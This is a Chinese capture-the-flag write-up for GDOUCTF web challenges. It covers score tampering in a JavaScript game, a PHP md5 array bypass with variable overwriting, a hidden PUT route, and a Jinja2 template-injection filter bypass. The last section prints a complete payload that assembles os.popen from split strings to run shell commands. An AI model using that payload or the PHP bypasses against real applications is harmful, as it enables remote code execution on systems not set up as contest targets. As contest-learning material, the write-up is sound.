您现在的位置是:首页 >学无止境 >GDOUCTF网站首页学无止境

GDOUCTF

YAy17 2023-05-16 16:00:02
简介GDOUCTF

WEB

hate eat snake

这是一个JS的题目,但是这个题目好像有点奇怪,不是很理解,当时我找到了我寝室JS的大哥,跟大哥说了一下我的思路,就是他根据这个time然后/1000转化为秒,就当作是我们玩游戏的一个分数!那我把1000改掉改成10,那么整体上的返回值的结果不就变大了嘛:

但是在改的时候,发现并不能成功,甚至我想直接删掉这一行代码,直接return 固定值就好了嘛,但是不明白为什么不成功,大哥跟我说下个断点跟一下看看,后来发现,他会不断的新建实例。防止修改里面的值。后来大哥跟我说将断点下载这个函数,直接在控制台去修改:

下断成功,转去控制台,在运行的过程中,修改掉函数的返回值!

上面的语句大概类似于 Snake.prototype.getScore = function(){ return 99999}

受不了一点

考察php特性

POST传参gdou[]=1&ctf[]=2,来绕过md5的强等!增加header头:cookie=j0k3r,然后get传递aaa=114514 bbb=114514a,之后就是变量覆盖,需要存在一个GET或者是POST方式的flag。同时flag参数的值不可以等于flag,之后便是 通过遍历POST请求的内容,覆盖变量中的值,遍历GET方式,将value变量的值,赋值给key变量。因此我们可以通过GET传递get=flag 然后flag=get 那么在遍历GET的时候,形成$get=$flag,会将变量get的内容覆盖成变量flag的内容,之后再执行flag=get,又将变量get内容赋值给flag,其实主要就是为了绕过上面的两个if条件,最终输出$flag。

EZ_WEB

源码泄露,查看源代码,会发现src路由。

之后访问该路由:

发现/super-secret-route-nobody-will-guess路由,请求方式是PUT,直接通过PUT方式访问该路由即可!

ez_ze

题目上来过滤了{{}},使用{%%}来绕过,同时过滤了点号和中括号以及下划线!

关于点号和[]被过滤的话,可以使用attr来绕过,下划线的就构造一个就可以了;

{%set pop=dict(pop=a)|join%}{%set xia=(()|select|string|list)|attr(pop)(24)%}

以上便可以构造出下划线,接下来我们尝试构造如下的payload:

lipsum.__globals__.__getitem__('os').popen('ls').read()
//接下来分别进行拼接globals getitem os popen read
{%set glo=(xia,xia,dict(globals=a)|join,xia,xia)|join%}
{%set geti=(xia,xia,dict(getit=a,em=a)|join,xia,xia)|join%}
{%set s=dict(o=a,s=a)|join%}
{%set open=dict(po=a,pen=a)|join%}
{%set read=dict(read=a)|join%}

中间的os popen 以及getitem均存在正则的匹配,拆开拼接即可!

最终形成如下payload:

{%set payload=(lipsum|attr(glo)|attr(geti)(s)|attr(open)('ls')|attr(read)())%}
{%print(payload)%}
风语者!平时喜欢研究各种技术,目前在从事后端开发工作,热爱生活、热爱工作。